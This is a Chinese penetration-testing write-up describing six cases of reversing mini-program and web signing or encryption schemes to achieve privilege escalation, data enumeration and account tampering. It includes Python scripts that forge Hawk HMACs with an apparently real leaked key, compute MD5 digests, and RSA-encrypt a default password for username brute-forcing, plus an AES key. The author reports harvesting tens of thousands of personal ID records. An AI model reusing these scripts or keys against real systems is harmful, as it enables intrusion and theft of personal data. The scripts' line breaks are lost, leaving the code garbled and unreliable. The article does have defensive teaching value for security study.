手把手拆解:小程序/Web端加密鉴权绕过案例全复现

原文首发在:奇安信攻防社区

https://forum.butian.net/share/4664

本文通过六个真实渗透测试案例,深入剖析小程序与Web端常见的加密鉴权机制,手把手演示如何通过反编译、动态调试、JS逆向与脚本复现,精准定位加密逻辑、还原签名算法,并最终实现越权访问、信息遍历与账号接管

本文通过六个真实渗透测试案例,深入剖析小程序与Web端常见的加密鉴权机制,手把手演示如何通过反编译、动态调试、JS逆向与脚本复现,精准定位加密逻辑、还原签名算法,并最终实现越权访问、信息遍历与账号接管。

案例一

某天对小程序进行登录时发现登录进去这个接口有个personalid参数,发现也是返回了个人信息,一开始还以为是一个改id进行越权的简单漏洞,但是当我再次发包以后显示时间ts有问题,改了ts以后又说nonce有问题,到最后改了nonce,发现mac又有问题,这里就大概了解了大概的一个鉴权(ts,nonce要变化)

到这里就可以发现是mac参数进行的鉴权,由于是小程序,所以反编译一下源码

这里全局搜一下mac

代码如下:

var o = {
                    ts: a,
                    nonce: i.nonce || e.utils.randomString(6),
                    method: n,
                    resource: r.resource,
                    host: r.host,
                    port: r.port,
                    hash: i.hash,
                    ext: i.ext,
                    app: i.app,
                    dlg: i.dlg
                },
                c = e.crypto.calculateMac("header", s, o),
                h = 'Hawk id="' + s.id + '",ts="' + o.ts + '",nonce="' + o.nonce + '",mac="' + c + '"';

这里的o是ts,nonce,method,resource,host,port这些组合起来的

可以看见mac是等于c的,其实就是请求方式和url及认证头里面的东西组合起来进行了一个加密

跟进一下e.crypto.calculateMac

全局搜索

加密逻辑

e.crypto = {
        headerVersion: "1",
        algorithms: ["sha1""sha256"],
        calculateMac: function(t, r, n{
var i = e.crypto.generateNormalizedString(t, n);
return s["Hmac" + r.algorithm.toUpperCase()](i, r.key).toString(s.enc.Base64)
        }

这里对calculateMac函数分析,这个函数是该对象的核心,它接受三个参数:

  • t
    原始数据
  • r
    包含算法和密钥的对象。这个对象内部有 r.algorithm(指定哈希算法,例如"sha1""sha256") 和 r.key(用于HMAC计算的密钥)。
  • n
    : 也就是o。
var i = e.crypto.generateNormalizedString(t, n);
  • 首先,调用 e.crypto.generateNormalizedString函数,传入 t和 n参数。
  • 这个函数将上一步准备好的 o对象(以及其他输入,如 t)按照 Hawk 协议的特定规则进行排序拼接,生成一个唯一的、标准化的字符串。这样的话就确保不管数据在原始对象中的顺序如何,只要内容不变,生成的标准化字符串就始终一致。这对于防止因数据顺序不一致而导致的签名验证失败
return s["Hmac" + r.algorithm.toUpperCase()](i, r.key).toString(s.enc.Base64)
  • 这行代码是实际进行HMAC计算和格式化的部分。
  • r.algorithm.toUpperCase()
    : 将传入的算法名称转换为大写,例如 sha1变为 SHA1
  • "Hmac" + r.algorithm.toUpperCase()
    : 动态构建HMAC算法名称,例如 "HmacSHA1"或 "HmacSHA256"
  • s["Hmac..."](i, r.key)
    : 使用标准化字符串 i和密钥 r.key来调用 HMACC 算法进行计算,返回一个HMAC结果。
  • .toString(s.enc.Base64)
    : 将计算出的HMAC结果转换为Base64编码的字符串,并作为函数的最终返回值。

这里就需要找到key了

一开始全局搜索key但是太多了

然后联想到一般key都会放在配置文件里面

搜了一下config

写个脚本试一下能不能使用

import base64
import hmacimport hashlibimport timedef generate_normalized_string(header_type, artifacts):"""生成 Hawk 规范化字符串"""    n = f"hawk.1.{header_type}n"    n += f"{artifacts['ts']}n"    n += f"{artifacts['nonce']}n"    n += f"{artifacts['method'].upper()}n"    n += f"{artifacts['resource']}n"    n += f"{artifacts['host'].lower()}n"    n += f"{artifacts['port']}n"    n += f"{artifacts['hash']}n"# 空字符串# 无 ext 参数    n += "n"# 无 app 和 dlg 参数return ndef calculate_mac(credentials, artifacts):"""计算 Hawk MAC 值"""    normalized_str = generate_normalized_string("header", artifacts)print("规范化字符串:")print("----------------------")print(normalized_str)print("----------------------")    key_bytes = credentials["key"].encode("utf-8")    msg_bytes = normalized_str.encode("utf-8")# 使用 SHA-256    hmac_digest = hmac.new(key_bytes, msg_bytes, hashlib.sha256).digest()return base64.b64encode(hmac_digest).decode("utf-8")# 输入参数credentials = {"id""wasx","key""edb8bc95-a000-4ca0-81b8-dd2145050a70F61FB1981510CE5D3988193864A328A3","algorithm""sha256"}timestamp = time.time()timestamps=int(timestamp)artifacts = {"ts": timestamps,"nonce""6a0d5d576135004ead6cf4795e5b6112",        "method""GET","resource""xxxx/List/QueryByPersonalid?personalid=668223","host""xxxxxxx","port""443","hash"""}# 计算并验证 MACcalculated_mac = calculate_mac(credentials, artifacts)print(f"计算 MAC: {calculated_mac}")

发现可以使用,后续也是遍历了7w+的sfz信息

案例二

这里是一个预约功能的地方,需要填写个人信息包括了身份证号,可以看见有个personCode参数,后面跟了一串数字,然后下滑可以发现返回了个人信息,原本想遍历一下这个参数的,但是说参数过期了,想都不要想肯定是digest加密导致的

一样的方法反编译一下

找到加密地方

这个就比较简单了,只有有个hexMD5加密

简单分析一下代码

var n = a.domainUrl(o.domain).match(/[^/]+$/)[1]  

这个正则表达式是匹配字符串末尾的非斜杠字符。例如,如果 a.domainUrl(o.domain)返回 “https://example.com/api”,那么它会匹配 “api”

u = o.url.includes("?") ? o.url.split("?")[0] : o.url
  • 这行代码处理 URL,去除查询参数。
  • o.url.includes("?")
    :检查 o.url字符串是否包含问号 ?
  • o.url.split("?")[0]
    :如果包含 ?,则用 ?分割 URL 字符串,并取第一个部分,即问号之前的部分。
digest: t.hexMD5("/".concat(n, "/") + u + s).toUpperCase()
  • "/".concat(n, "/")
    :将字符串 n用斜杠包裹起来。例如,如果 n是 “api”,结果就是 “/api/”。
  • + u + s
    :将上一步的结果、不带参数的 URL u和时间戳 s拼接在一起。
  • t.hexMD5(...)
    :调用一个名为 t的对象上的 hexMD5方法,对拼接后的字符串进行 MD5 哈希计算。MD5 是一种常见的哈希算法,用于生成一个唯一的、固定长度的散列值。
  • .toUpperCase()
    :将生成的 MD5 散列值转换为大写。

分析完毕,开始写脚本:

import re
import hashlibimport timedef calculate_digest(domain, url, timestamp):# 提取domain的最后路径片段match = re.search(r'/([^/]+)/?$', domain)if not match:        raise ValueError("Invalid domain format")    n = match.group(1)# 去掉URL的查询参数    u = url.split('?'1)[0]# 拼接字符串    s = f"/{n}/{u}{timestamp}"# 计算MD5并转大写return hashlib.md5(s.encode('utf-8')).hexdigest().upper()# 示例调用if __name__ == "__main__":    domain = 'xxxxx'    url = 'xxxxx'    timestamp = int(time.time() * 1000)  # 获取毫秒级时间戳print("Timestamp:", timestamp)    digest = calculate_digest(domain, url, timestamp)print("digest:", digest)

案例三

这里说一下快速找到加密点的方法

xhr打断点进行定位加密,选一个标志性的进行定位

加入xhr

刷新页面,断住了,接下来看它的作用域来寻找加密参数

往上跟栈,发现加密参数

再往上跟几个栈,找到最后一个出现加密参数的地方

接下来直接上案例

这个是web端的js逆向,在查看网页源代码的时候发现了默认密码111111,并且没有验证码校验,这里大概的一个攻击思路就是固定密码爆破用户名

但是在抓包的时候发现,password被加密了

这里又需要js逆向了

一开始是搜索加密参数,然后挨个看了下发现加密函数

rsa.setPublic(modulus, exponent)
  • **modulus**
    (模数):这是一个非常大的数字,这里用十六进制字符串表示。它是 RSA 密钥对的核心部分。从其长度(256个字符)来看,这是一个 1024 位的密钥。
  • **exponent**
    (公钥指数):值为 "10001",这是一个常用的公钥指数,它的十六进制值是 65537。选择这个值是因为它是一个质数,且二进制表示中只有两个 1,可以加快加密运算的速度。
  • rsa.setPublic()
    方法将这两个值设置为 rsa对象的公钥,使其准备好进行加密。

跟进一下这个加密函数

var m = pkcs1pad2(text,(this.n.bitLength()+7)>>3);
  • **pkcs1pad2**
    是一个填充函数,它根据 PKCS #1 v1.5标准对明文进行填充,确保明文的长度适合加密。
  • this.n
    代表 RSA 密钥对中的 模数(modulus)this.n.bitLength()获取模数的位长度。
  • (this.n.bitLength() + 7) >> 3
    是一个计算字节长度的位运算技巧,等同于 Math.ceil(this.n.bitLength() / 8)。它确保填充后的数据长度与 RSA 密钥的长度匹配。
  • 如果填充失败,函数返回 null
var c = this.doPublic(m);
  • **this.doPublic(m)**
    是执行 RSA 公钥加密的核心操作。它使用 RSA 公钥(模数**n**和 公钥指数**e**)将填充后的明文 m进行加密。
  • 加密公式为:c=me(modn),其中 c是密文,m是填充后的明文,e是公钥指数,n是模数。
  • 如果加密失败,函数返回 null
var h = c.toString(16);
  • c
    通常是一个大数对象,toString(16)将其转换为十六进制字符串 h
  • if((h.length & 1) == 0) return h; else return "0" + h;
  • 这是一个确保十六进制字符串长度为偶数的检查。

接下来就可以写加密脚本了

import base64
from cryptography.hazmat.primitives import serialization, paddingfrom cryptography.hazmat.primitives.asymmetric import rsa, padding as asymmetric_paddingfrom cryptography.hazmat.backends import default_backend# 1. 设置公钥的模数和指数modulus_hex = "B87A3BE2184FED0973FFB0B02A862DCAD15A1A29172EC8FF67E841FE26749A6AA04E48E9B02D963ED81DCE2B0086C034F7D47CCBACF8539C36B9445ABA5EF484F3CA32593762641B4C9683C79801D087198370D5719BB4E422FADAA4D883D13874DE67D8B6E883EBAACC53A8480F41EE8BE70D2F70BECF3CB7F1023D2C901CC3"exponent_hex = "10001"# 将十六进制字符串转换为整数n = int(modulus_hex, 16)e = int(exponent_hex, 16)public_numbers = rsa.RSAPublicNumbers(e, n)public_key = public_numbers.public_key(default_backend())# 3. 定义加密函数def rsa_encrypt(plaintext, public_key):    ciphertext = public_key.encrypt(        plaintext.encode('utf-8'),        asymmetric_padding.PKCS1v15()    )# 转换为十六进制字符串,并确保长度为偶数    hex_ciphertext = ciphertext.hex()if len(hex_ciphertext) % 2 != 0:        hex_ciphertext = '0' + hex_ciphertextreturn hex_ciphertextpsw = "111111"# 4. 执行加密encrypted_psw = rsa_encrypt(psw, public_key)print(f"待加密的明文: {psw}")print(f"加密后的密文: {encrypted_psw}")print(f"密文长度: {len(encrypted_psw)} 字符")

案例四

这里在一个数据包里面发现了一个密钥

这里发现账户鉴权的参数是account,js翻到是rsa加密

functionencrypt(username, privatKey{
const encrypt = new JSEncrypt();
        encrypt.setPublicKey(privatKey);
const encrypted = encrypt.encrypt(username);
if (encrypted) {
return encrypted;
        }

只需要提供用户名和密钥就可以加密了,由于这里已经有了密钥,那直接控制台调用就好了

普通用户登录后,发现了管理员用户名,同样的方法加密

直接泄露了几万条数据

案例五

这里是小程序的一个注销功能

注销账号为post方式的加密数据,这里就需要对小程序进行js逆向调试

这里我们根据路由来找加密点

js逆向动态调试的好处就是可以修改数值,它也会自动生成密文,这里就直接动调的时候给手机号改了,就可以了

案例六

小程序这里有个保存用户信息的地方,抓包可以看到也是被加密了,这里返回了一个yhgrid

对小程序的如下JS进行断点调试:抓取修改用户地址信息接口,报文加密为AES-CBC-ZERO,key和iv为UKU0m5xBbOa/Lz==,再加上url编码解密可得

修改grid

发包修改成功

再次查看用户信息,发现被成功修改了

通过对六个典型场景的拆解,我们不难发现:“加密 ≠ 安全”。无论是Hawk协议中的动态签名、MD5时间戳校验,还是RSA/AES等标准加密算法,其安全性高度依赖于密钥管理、参数时效性与实现细节。一旦密钥泄露、nonce可预测、ts未严格校验,或加密逻辑被完整逆向,整个鉴权体系将形同虚设。


文章来源:亿人安全


黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END



© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容